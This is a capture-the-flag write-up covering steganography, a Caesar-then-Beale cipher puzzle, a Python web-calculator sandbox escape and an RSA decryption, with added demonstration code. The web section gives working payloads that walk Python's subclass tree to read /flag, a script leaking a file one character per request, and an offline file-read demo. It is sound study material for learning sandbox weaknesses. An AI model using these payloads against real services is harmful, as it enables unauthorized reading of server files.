Misc section:

套娃 (Matryoshka)

Download and unzip the archive: six nested folders, with one image in each layer.

The first five images are actually useless; only the sixth matters.

The sixth image is BGR LSB steganography, and there are two ways to solve it.
The first is to use Stegsolve.


The second is to use a very handy tool, zsteg.
Installing zsteg on Linux is simple:

gem install zsteg


Then the following command shows how zsteg is used:

zsteg -h

For this challenge the tool solves it with no thinking required:

zsteg 6.png


which gives the flag:

flag{03a253f5-8e93-4533-bcfc-af908830095d}
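What zsteg does when it reports a channel such as b1,bgr,lsb,xy is simple enough to write by hand: take the least significant bit of every colour sample, visiting each pixel's channels in B, G, R order, and pack the bits MSB-first into bytes. The following is an added example, not part of the original writeup or of zsteg: it builds a constructed 100-pixel RGB image in pure Python, hides a sample flag in its BGR LSBs, and then recovers it by brute-forcing the channel orders the way zsteg does. Reading pixels from the real 6.png would be done with Pillow, e.g. Image.open("6.png").convert("RGB").getdata(), which is assumed here rather than shown.

```python
import re

# Constructed sample cover image: 100 RGB pixels with deterministic pseudo-random
# values, standing in for the pixel data of 6.png.
PIXELS = [((i * 37) % 256, (i * 91 + 5) % 256, (i * 143 + 11) % 256) for i in range(100)]
CHANNEL = {"r": 0, "g": 1, "b": 2}


def embed_lsb(pixels, payload, order="bgr"):
    """Write payload bits (MSB first) into the LSB of each colour sample,
    visiting the channels of every pixel in `order`. Only used to build test data."""
    bits = [(byte >> (7 - i)) & 1 for byte in payload for i in range(8)]
    if len(bits) > len(pixels) * len(order):
        raise ValueError("payload does not fit in the cover image")
    out = []
    pos = 0
    for px in pixels:
        px = list(px)
        for ch in order:
            if pos < len(bits):
                px[CHANNEL[ch]] = (px[CHANNEL[ch]] & 0xFE) | bits[pos]
                pos += 1
        out.append(tuple(px))
    return out


def extract_lsb(pixels, order="bgr"):
    """The inverse: collect one LSB per sample in channel order and pack eight
    bits into a byte, MSB first. This is zsteg's b1,<order>,lsb,xy channel."""
    bits = [px[CHANNEL[ch]] & 1 for px in pixels for ch in order]
    data = bytearray()
    for i in range(0, len(bits) - 7, 8):
        byte = 0
        for b in bits[i:i + 8]:
            byte = (byte << 1) | b
        data.append(byte)
    return bytes(data)


def find_flag(pixels, orders=("rgb", "bgr", "r", "g", "b")):
    """Try the channel orders the way zsteg does and report the first one whose
    LSB stream contains a flag{...} string; wrong orders only yield noise."""
    for order in orders:
        m = re.search(rb"flag\{[^}]*\}", extract_lsb(pixels, order))
        if m:
            return order, m.group(0)
    return None


# Constructed stego image: the sample flag hidden in BGR order.
STEGO = embed_lsb(PIXELS, b"flag{constructed_sample}", "bgr")

if __name__ == "__main__":
    print(find_flag(STEGO))
```

Note that "rgb" is tried before "bgr": with the wrong channel order the bits of every pixel come out permuted and the flag pattern does not appear, which is why zsteg enumerates orders rather than guessing one.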

BILL

The challenge gives a strange string:

   wpmio hzmxdgznn gzbdngvopmz mzopmizy pirvmmviovwgz lpvmozmdib, gzbdngvodqz znovwgdnc bdqdib qjdxz xjhkgzoz yzkjndojmt qvgpvwgz cjgy rjmfn epmdnydxodji, rjmfn epybzn wzvm wjydzn epno lpvmozmdib ajmhdyvwgz pivxfijrgzybzy vmhdzn ziodogz cvmvnn bdqdib gdwzmot rvbdib fijri xjixgpyz gzqt ovfzi omjjkn yzndbi kvodzio yjhznodx pivgdzivwgz fijri zsoziy mzkzvozy rjpgy mpgzm kmjozxodib vaazxozy cdnojmt wzbpi, bjqzmihzio rjmfn cjgy fzko vaazxozy xvpnzn ziyjrzy diznodhvwgz ijo ajmhdyvwgz, zszxpodjizmn izxznnvmt, bjqzmihzio, vgozm diqznozy rvmavmz kpwgdx vi vit epybzn bpvmyn jixz kzjkgz fdiymzy pigznn bjqzmihzio gzqt bpvmyn lpvmozmdib, gdbco zigvmbdib vnnzio xcvmvxozm izdbcwjmdib odzn kmdixdkgzn diqvmdvwgt fdiymzy yznjgvodji vpocjmdot avodbpdib admh jkdidjin, odhzn mpgz hpmyzm fdiymzy zhdbmvodji wjpiyvmdzn diqznozy npkkjmo fdiymzy jiz zvxc ivodqz bjjy fijri gzo zskjnzy rczizqzm piado xvggzy qvgpvwgz ajmhn ocdn hzi lpvmozmdib mzno pigznn nvqvbzn amjh hpmyzm mzopmizy, nzxpmdot diznodhvwgz hzmxzivmdzn epno ijo qjdxz oj wztjiy yznompxodji xdoduzin xjinzio ntnozhn mzymznn, piyzm izbgzxozy amzz xjiomvxo ivodqz rjmfn qvgpvwgz cphwgz jwnompxozy npkmzhz, jigt qjdxz cvoc fdiymzy epno lpvmozmdib rczi xjiepmzy jkkmznndjin ydnnjgqz ydnnjgqz ja ajmhzm cjpnzn mzno joczmn hjno hvyz, nzszn azggjr lpvmozmdib, rczmzwt lpvmozmdib epybzn ydnomdxon cvmvnn kvnn, gdqzn epnodxz poozmgt qjdxz ajmhzm wpmio gzbdngvopmz hzi dhhzydvoz lpvmozmdib ja lpvmozmdib ojovggt kmznzio jwnompxodib bjjy cjgy, pivgdzivwgz kmjqz novodji di oczmzajmz nzkvmvoz qjdxz dinodopozy lpvmozmdib, kmjozxodib ivopmvgdudib epmdnydxodji mzxjmyn, qjdxz nzkvmvoz qvgpvwgz yznomjtzy xcvmvxozm izbgzxozy hpmyzm kpidnchzio, npaazmvwgz, hzmxdgznn oczh, omdzy wzxjhzn ijo epnodxz ydmzxo gzqt, fijri zvxc vwydxvozy, vkkzvgdib bdqdib, cdnojmt wzbpi diznodhvwgz mzapnzy dizqdovwgt piydnodibpdnczy wjpiyvmdzn.
fgal{df3e46bd64c55ac06477b5388452859bc107ca9526e1b8533a56344d3e8e2c1a9b60e1dc2a5a96}

The last line is obviously related to the flag, though its order looks scrambled.
First take everything except the last line and try a Caesar shift, listing all 26 rotations.

One of them (a shift of 5) turns out to be normal English:

burnt merciless legislature returned unwarrantable quartering, legislative establish giving voice complete depository valuable hold works jurisdiction, works judges bear bodies just quartering formidable unacknowledged armies entitle harass giving liberty waging known conclude levy taken troops design patient domestic unalienable known extend repeated would ruler protecting affected history begun, government works hold kept affected causes endowed inestimable not formidable, executioners necessary, government, alter invested warfare public an any judges guards once people kindred unless government levy guards quartering, light enlarging assent character neighboring ties principles invariably kindred desolation authority fatiguing firm opinions, times rule murder kindred emigration boundaries invested support kindred one each native good known let exposed whenever unfit called valuable forms this men quartering rest unless savages from murder returned, security inestimable mercenaries just not voice to beyond destruction citizens consent systems redress, under neglected free contract native works valuable humble obstructed supreme, only voice hath kindred just quartering when conjured oppressions dissolve dissolve of former houses rest others most made, sexes fellow quartering, whereby quartering judges districts harass pass, lives justice utterly voice former burnt legislature men immediate quartering of quartering totally present obstructing good hold, unalienable prove station in therefore separate voice instituted quartering, protecting naturalizing jurisdiction records, voice separate valuable destroyed character neglected murder punishment, sufferable, merciless them, tried becomes not justice direct levy, known each abdicated, appealing giving, history begun inestimable refused inevitably undistinguished boundaries.

Combined with the challenge name, we can guess that this is a Beale cipher; see Wikipedia: https://zh.wikipedia.org/wiki/%E6%AF%94%E5%B0%94%E5%AF%86%E7%A0%81

If it is a Beale cipher, then the first letters of the words of the English text, joined together, form the key, and the flag-like string below it is the ciphertext (each hex byte is a position in that key).
First extract the key with a script:

# encoding: utf-8
# Read the recovered English text and join the first letter of every word.
with open('text.txt', 'r') as f:
    lines = f.readlines()

words = []
for line in lines:
    words += line.split(' ')
print('=========== words split =============')

initials = []
for word in words:
    initials += word[0:1]      # '' for an empty token, which adds nothing
print('=========== initials extracted ===============')
key = "".join(initials)
print(key)

which gives the following key:

bmlruqlegvcdvhwjwjbbjqfuaehglwkclttdpdukerwrpahbgwhkaceinfengaiwpaajgopkuglgqleacntpikdaffotrmkebiskoengklewucvftmqrusfmrsimjnvtbdccsrunfcnwvhosovhkjqwcoddofhrommsfqwqjdhpljuvfblmiqoqtpoghupsitsviqpnjrvsvdcnmpsmttbnjdlkeaaghbiriub

Then write a script to decrypt:

key = "bmlruqlegvcdvhwjwjbbjqfuaehglwkclttdpdukerwrpahbgwhkaceinfengaiwpaajgopkuglgqleacntpikdaffotrmkebiskoengklewucvftmqrusfmrsimjnvtbdccsrunfcnwvhosovhkjqwcoddofhrommsfqwqjdhpljuvfblmiqoqtpoghupsitsviqpnjrvsvdcnmpsmttbnjdlkeaaghbiriub"
# the hex from the challenge's fgal{...} line: every byte is a 0-based index into the key
cipher_hex = 'df3e46bd64c55ac06477b5388452859bc107ca9526e1b8533a56344d3e8e2c1a9b60e1dc2a5a96'
out = []
for num in range(0, 39):                    # 39 hex pairs
    hex_num = cipher_hex[2*num] + cipher_hex[2*num+1]
    int_num = int(hex_num, 16)
    out.append(key[int_num])
print("".join(out))


The script prints the inner text, hippopotomonstrosesquippedaliophobiawow; wrapped in flag{} it is the flag:

flag{hippopotomonstrosesquippedaliophobiawow}
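The three manual steps above (find the Caesar shift, take the word initials, index the key with the hex bytes) can be chained into one script. This is an added example and not the writeup's own code; it reuses the key and hex ciphertext shown above, and takes only the opening of the challenge text as SNIPPET, which is enough for a letter-frequency score to pick out the shift automatically instead of eyeballing all 26 rotations. It also adds the encryption direction, so the cipher can be exercised end to end; the rotating choice among candidate key positions in beale_encrypt is my own deterministic substitute for the random choice a real Beale cipher user would make.

```python
# Key and ciphertext exactly as in the writeup above.
KEY = "bmlruqlegvcdvhwjwjbbjqfuaehglwkclttdpdukerwrpahbgwhkaceinfengaiwpaajgopkuglgqleacntpikdaffotrmkebiskoengklewucvftmqrusfmrsimjnvtbdccsrunfcnwvhosovhkjqwcoddofhrommsfqwqjdhpljuvfblmiqoqtpoghupsitsviqpnjrvsvdcnmpsmttbnjdlkeaaghbiriub"
CIPHER_HEX = "df3e46bd64c55ac06477b5388452859bc107ca9526e1b8533a56344d3e8e2c1a9b60e1dc2a5a96"
# Opening of the challenge text, before the Caesar shift.
SNIPPET = ("wpmio hzmxdgznn gzbdngvopmz mzopmizy pirvmmviovwgz lpvmozmdib, gzbdngvodqz "
           "znovwgdnc bdqdib qjdxz xjhkgzoz yzkjndojmt qvgpvwgz cjgy rjmfn epmdnydxodji, "
           "rjmfn epybzn wzvm wjydzn epno lpvmozmdib")

# Ten most frequent letters of English; a correctly shifted text puts ~70% of its letters here.
COMMON = set("etaoinshrl")


def caesar(text, shift):
    """Rotate letters by `shift`, leaving punctuation and spaces untouched."""
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord('A') if ch.isupper() else ord('a')
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def find_shift(ciphertext):
    """Score all 26 rotations by how many letters land on COMMON; the real
    shift wins by a wide margin on anything longer than a sentence or two."""
    return max(range(26), key=lambda s: sum(ch in COMMON for ch in caesar(ciphertext, s)))


def initials(text):
    """Key derivation: first letter of every word (punctuation is trailing, so it is skipped)."""
    return "".join(w[0] for w in text.split() if w[0].isalpha())


def beale_decrypt(key, hex_indices):
    """Each byte of the ciphertext is a 0-based position in the key string."""
    return "".join(key[b] for b in bytes.fromhex(hex_indices))


def beale_encrypt(key, plaintext):
    """Reverse direction: replace each letter by the position of a key word
    starting with it. Candidates are used in rotation so output is repeatable;
    positions must fit in one byte, which holds for this 230-letter key."""
    positions = {}
    for i, ch in enumerate(key):
        positions.setdefault(ch, []).append(i)
    used = {}
    out = bytearray()
    for ch in plaintext:
        if ch not in positions:
            raise ValueError("letter %r never starts a key word" % ch)
        cands = positions[ch]
        n = used.get(ch, 0)
        if cands[n % len(cands)] > 255:
            raise ValueError("key too long for one-byte indices")
        out.append(cands[n % len(cands)])
        used[ch] = n + 1
    return out.hex()


def solve():
    """Shift search -> initials -> Beale decode, checked against the full key."""
    shift = find_shift(SNIPPET)
    english = caesar(SNIPPET, shift)
    if not KEY.startswith(initials(english)):
        raise ValueError("derived initials do not match the key")
    return shift, beale_decrypt(KEY, CIPHER_HEX)


if __name__ == "__main__":
    print(solve())
```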

Web section

calc


Appending any path to the URL produces a Python traceback, so this should be a Python sandbox escape.
The ctf-wiki summary of Python sandbox escapes is a good reference: https://ctf-wiki.github.io/ctf-wiki/pwn/sandbox/python-sandbox-escape/

0+0+ord(().__class__.__bases__[0].__subclasses__()[40](r"/flag").read()[0])

This reads out the ASCII code of a single character of the flag at a time. Index 40 of object's subclass list is the file type on this Python 2 target; the position depends on the interpreter build, so when a payload like this fails, enumerate __subclasses__() first instead of trusting the number.
The flag can then be collected with the following script:

import re
import requests

rs = requests.Session()
url = "http://3ec734df4e344b51afa37d0e44cdd1fc1842648aafa04af4.game.ichunqiu.com/"
# the app sets an _xsrf cookie that has to be sent back with every POST
xsrf = rs.get(url).cookies['_xsrf']
cookies = dict(_xsrf=xsrf)
flag = []
for i in range(0, 43):   # 43 = length of the flag, found by trial
    # ord() of the i-th byte of /flag, added to 0+0 so the calculator still sees a number
    payload = '0+0+ord(().__class__.__bases__[0].__subclasses__()[40](r"/flag").read()[%d])' % i
    data = {'expr': payload, '_xsrf': xsrf}
    html = rs.post(url, data=data, cookies=cookies).text
    res = re.findall(r'\d+', html)
    c = res[19]          # the 20th number in the response page is the result (layout specific)
    flag.append(chr(int(c)))

print(''.join(flag))

That is rather laborious; reading other people's writeups afterwards, the following payload gives the flag in one request:

1+1+int(([].__class__.__base__.__subclasses__()[40]('/flag','r').read()).encode('utf-8'),16)

The file contents are not valid hex, so int() raises a ValueError, and the traceback page echoes the offending string, flag included.
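Both payloads above rely on the same two ideas: walk from a literal to object's subclass list to reach something that can read a file, and then smuggle the result out either one ord() at a time or through an error message. The block below is an added example, not code from the writeup or from the challenge: it runs offline against a toy sandbox (my assumption about the real calculator is that it eval()ed expressions with the builtins stripped but ord and int still reachable), targets Python 3 rather than the Python 2 file type the challenge had at index 40, and locates the gadget by class name (os._wrap_close, whose function globals are the os module's) instead of a fixed index. The character-by-character leak also stops on IndexError instead of assuming a flag length of 43.

```python
import os
import re
import tempfile

# Toy stand-in for the challenge's calculator (assumption, see lead-in).
SAFE_BUILTINS = {"ord": ord, "int": int}


def sandbox_eval(expr):
    return eval(expr, {"__builtins__": SAFE_BUILTINS}, {})


# Gadget: os.py's globals, found by class name rather than by position.
# os._wrap_close is defined in os.py, which every CPython 3 process imports.
OS_GLOBALS = ("[c for c in ().__class__.__base__.__subclasses__()"
              " if c.__name__ == '_wrap_close'][0].__init__.__globals__")

# Read a file via os.open/os.read/os.close so no open() builtin is needed;
# {path!r} is filled in with the target path.
READ_FILE = ("(lambda g: (lambda fd: (g['read'](fd, 4096), g['close'](fd))[0].decode())"
             "(g['open']({path!r}, g['O_RDONLY'])))(" + OS_GLOBALS + ")")


def leak_char_by_char(path):
    """The first approach above: one ord() per request, continuing until the
    index runs past the end of the file instead of assuming a fixed length."""
    out = []
    i = 0
    while True:
        try:
            code = sandbox_eval("0+0+ord(%s[%d])" % (READ_FILE.format(path=path), i))
        except IndexError:          # read()[i] past the end of the content
            break
        out.append(chr(code))
        i += 1
    return "".join(out)


def leak_via_error(path):
    """The second approach: hand the contents to int(..., 16); non-hex text makes
    int() raise, and the ValueError message echoes the whole string."""
    expr = "1+1+int(%s.strip(), 16)" % READ_FILE.format(path=path)
    try:
        sandbox_eval(expr)
    except ValueError as e:
        m = re.search(r"base 16: '(.*)'$", str(e))
        return m.group(1) if m else None
    return None                     # contents happened to be valid hex: no leak this way


def demo():
    """Constructed sample: a flag file in the challenge's format (not the real /flag)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("flag{this_is_a_constructed_sample}\n")
    try:
        return leak_char_by_char(f.name).strip(), leak_via_error(f.name)
    finally:
        os.unlink(f.name)


if __name__ == "__main__":
    print(demo())
```

The defensive lesson is the same one the payloads teach: removing names from __builtins__ is not a sandbox, because every object still carries __class__ and the subclass tree reaches the whole interpreter.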

Crypto

babyrsa

Download the file and open it in an editor:

d = 171667543985758425014232627985840717336387122108163758500542139626729279212540485673813409388397427405892256280730752710530037468765259171638824687119216443453078833931370749271396524300663719786871097595637432285751800013612137436020725492852419342272435212733486026753609513054804440530485467017884797272879406284689903095072725307517165288748564887361729738358011463377509622604034612759898436024272853796444439505507110804160400608180412245257162062494766079887998276493727771202445125297118556385657613871902180087388189988280105656191733965985878495407148701887047735812018200868151321246119065258205755102189932618492331181731032930671506379119003614308043854723142913145153824556828017544028126772950732350030371733003652817854070184981540813302478821473998511699291112000260313162924676245915026226201977284465842505256191235822318812659628683043195357384607192367037650400361829016395922074065034014120534209020328864830006606839179592932609256661738193663329776230050481312159600570791315455079679469956882283489829258240404557309270261381865785081719442470884775430068193960751589033994677379472095235901602941733635505402949964622214247924792042997962235246007680923289071880896909708764598890244005005286926994431628289

n = 365848589691553391654453815696801609393691558975114732077589431735072735814004481321693204054611153742844719038444697593327493027785795731389621927670788503335861977736740530534583572225955976966446771693720421426616666151538067479984725761741317847115913974275314572559550814811157603376899910638368755166255776849626761808720772583206050387900451906315871548607212450421821284358760939660687558588799753487824506759639032283177034815892289194765173975342074810666614953387403646634191147782168926568900983361174986224868620163303631776464544385042160475855173792780028858673004579549168611488908206940265042017827224145445864849990033230038346962998044409425059655414595541354712964867076540952852074402602485254837693009606256646491881886402251519107628767780560029195077356603998621239496833842620813594476086809217145741837067697701029006079475655230057641122885601163764359304119539318186498359110652713132230601632984636292710845264886583673643096710521658506038045125724977714211793704349604343253187208130136333839351343850952892593409667791896415744436543839302830842902421646274217466522255794836216649020356914498443158290307092169834254304137975684324590877396301465368942446331758175055737212871262544202124864201404357

e = 65537


enc = ICCHhzayltixzeuA++PPbDwlialEjQuDBx38ecgQwl5lOTnemrcWYbDeQkIIE5oPQOcSmNX8nmcD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=

We are given d, n and e together with the ciphertext enc, so computing the plaintext m = enc^d mod n should give the flag:

# encoding: utf-8
import base64

# ciphertext: base64 -> bytes -> big-endian integer
c = int.from_bytes(base64.b64decode("ICCHhzayltixzeuA++PPbDwlialEjQuDBx38ecgQwl5lOTnemrcWYbDeQkIIE5oPQOcSmNX8nmcDgyl4O05jYD7VmDcgwQTIgHeOLovcqGVPHEW4hHSmIR3BB/CBjb3/5+HfeifXF1w+/o148o76D9NtTBYaLk8CTjOscT23PBI8w+WPhHBIPaSbJlDuaHA4Ie6ojsE6mM7cp79dz7bCdAf5a2tUGA6AbNCuP1WVnsBI+IIHX8EDELmBnQ5c13JuYnjHL5lmqL3QK88QwQQ4h/3vUODAWBuzn8meWBgfpqxmHTGJ+du2mRoUTpUBzZy2OxrKdD8J11Hc+yJJJkQe5QgqACbM00K0rTv7kIyB2aB/gUGLNP4IOwV09avUpzLS2PPLgeAVP/JSGYlXZTthy4FlqL5pMN4/+swNnEN6Z+lPzLNe0JB0uNN/yPJ3C3lsSuoFLh0InYI46Tycs8vz1nHQWjQdE6hpD/HpyCbjoC2BE4ugCJKUtmp7mbyDxkjkn5ZkHhrJXK/DF4NQgYmfkZxyLOWsI2UC1niq5qGD3SIspW8NcupyGakYVzD1R9PP8xoxpkjX62f7myXLMmacbJgYe7ExeWdYXMZd76Tnqu9IJJwEO43LZz+w2rqH8DIlhr64JenxaDcIixqFzKmkk6WK71VVT3t788ZxaNhG2yo="), 'big')

d =171667543985758425014232627985840717336387122108163758500542139626729279212540485673813409388397427405892256280730752710530037468765259171638824687119216443453078833931370749271396524300663719786871097595637432285751800013612137436020725492852419342272435212733486026753609513054804440530485467017884797272879406284689903095072725307517165288748564887361729738358011463377509622604034612759898436024272853796444439505507110804160400608180412245257162062494766079887998276493727771202445125297118556385657613871902180087388189988280105656191733965985878495407148701887047735812018200868151321246119065258205755102189932618492331181731032930671506379119003614308043854723142913145153824556828017544028126772950732350030371733003652817854070184981540813302478821473998511699291112000260313162924676245915026226201977284465842505256191235822318812659628683043195357384607192367037650400361829016395922074065034014120534209020328864830006606839179592932609256661738193663329776230050481312159600570791315455079679469956882283489829258240404557309270261381865785081719442470884775430068193960751589033994677379472095235901602941733635505402949964622214247924792042997962235246007680923289071880896909708764598890244005005286926994431628289
N = 365848589691553391654453815696801609393691558975114732077589431735072735814004481321693204054611153742844719038444697593327493027785795731389621927670788503335861977736740530534583572225955976966446771693720421426616666151538067479984725761741317847115913974275314572559550814811157603376899910638368755166255776849626761808720772583206050387900451906315871548607212450421821284358760939660687558588799753487824506759639032283177034815892289194765173975342074810666614953387403646634191147782168926568900983361174986224868620163303631776464544385042160475855173792780028858673004579549168611488908206940265042017827224145445864849990033230038346962998044409425059655414595541354712964867076540952852074402602485254837693009606256646491881886402251519107628767780560029195077356603998621239496833842620813594476086809217145741837067697701029006079475655230057641122885601163764359304119539318186498359110652713132230601632984636292710845264886583673643096710521658506038045125724977714211793704349604343253187208130136333839351343850952892593409667791896415744436543839302830842902421646274217466522255794836216649020356914498443158290307092169834254304137975684324590877396301465368942446331758175055737212871262544202124864201404357
e = 65537

def egcd(a, b):
    """Extended Euclid: returns (g, x, y) with a*x + b*y = g = gcd(a, b)."""
    if a == 0:
        return (b, 0, 1)
    g, y, x = egcd(b % a, a)
    return (g, x - (b // a) * y, y)

def modinv(a, m):
    """Modular inverse. Not needed here because d is handed to us, but this is
    how d = e^-1 mod phi(N) would be computed if only p and q were known."""
    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception('modular inverse does not exist')
    return x % m

m = pow(c, d, N)

# hex(m) has an odd number of digits here, so skip '0x' plus the leading nibble
# before decoding the remaining hex pairs to bytes
print(bytes.fromhex(hex(m)[3:]))
# flag{w3lC0M3_t0_rS4_w0RlD}

which gives the flag:

flag{w3lC0M3_t0_rS4_w0RlD}
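Being handed d makes the challenge a one-liner, but it is worth seeing what d actually buys an attacker: with (n, e, d) the modulus can be factored, which is why a leaked private exponent is a full key compromise and not just a decryption oracle. The block below is an added example and not part of the writeup: it builds a constructed toy key from two Mersenne primes (2^107-1 and 2^127-1, both known primes, far too small for real use), encrypts the flag into the same base64 format the challenge handed out, decrypts it the way the script above does, recovers p and q from (n, e, d), and decrypts again with the CRT form that real libraries use.

```python
import base64
from math import gcd

# Constructed toy parameters: Mersenne primes, small but enough for a 26-byte message.
P = 2**107 - 1
Q = 2**127 - 1
E = 65537


def make_keypair(p, q, e=E):
    """Textbook RSA key generation: n = p*q, d = e^-1 mod phi(n)."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    return n, e, pow(e, -1, phi)        # Python 3.8+ modular inverse


def encrypt(message, n, e):
    """bytes -> integer -> c = m^e mod n -> base64, the format the challenge used (no padding)."""
    m = int.from_bytes(message, "big")
    if m >= n:
        raise ValueError("message must be smaller than the modulus")
    c = pow(m, e, n)
    return base64.b64encode(c.to_bytes((n.bit_length() + 7) // 8, "big")).decode()


def decrypt(enc_b64, n, d):
    """What the writeup's script does: base64 -> integer -> m = c^d mod n -> bytes."""
    c = int.from_bytes(base64.b64decode(enc_b64), "big")
    m = pow(c, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def recover_factors(n, e, d):
    """Knowing d is as good as knowing p and q: e*d - 1 is a multiple of phi(n),
    so g^((e*d-1)/2^i) mod n hits a non-trivial square root of 1 for some i,
    and gcd(root - 1, n) splits n. Probabilistic in g, so several bases are tried."""
    k = e * d - 1
    t = 0
    while k % 2 == 0:               # write e*d - 1 = 2^t * k with k odd
        k //= 2
        t += 1
    for g in range(2, 100):
        y = pow(g, k, n)
        if y in (1, n - 1):
            continue
        for _ in range(t):
            x = pow(y, 2, n)
            if x == 1:              # y is a square root of 1 other than +-1
                p = gcd(y - 1, n)
                return min(p, n // p), max(p, n // p)
            if x == n - 1:          # chain reaches -1 first: trivial, try next g
                break
            y = x
    raise ValueError("could not split n")


def decrypt_crt(enc_b64, p, q, d):
    """Decryption with the Chinese Remainder Theorem (Garner's form): two
    half-size exponentiations instead of one full-size one."""
    c = int.from_bytes(base64.b64decode(enc_b64), "big")
    dp, dq = d % (p - 1), d % (q - 1)
    mp, mq = pow(c, dp, p), pow(c, dq, q)
    h = (pow(q, -1, p) * (mp - mq)) % p
    m = mq + h * q
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def demo():
    n, e, d = make_keypair(P, Q)
    enc = encrypt(b"flag{w3lC0M3_t0_rS4_w0RlD}", n, e)
    plain = decrypt(enc, n, d)
    p, q = recover_factors(n, e, d)
    return plain, (p, q) == (P, Q), decrypt_crt(enc, p, q, d) == plain


if __name__ == "__main__":
    print(demo())
```

The same recover_factors routine applied to the challenge's own (n, e, d) would yield its p and q; they are not reproduced here because the page never shows them.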

Last updated: 2018-08-23 18:35

Original link: http://drac0nids.top/2018/08/22/网鼎杯部第二场部分WriteUp/
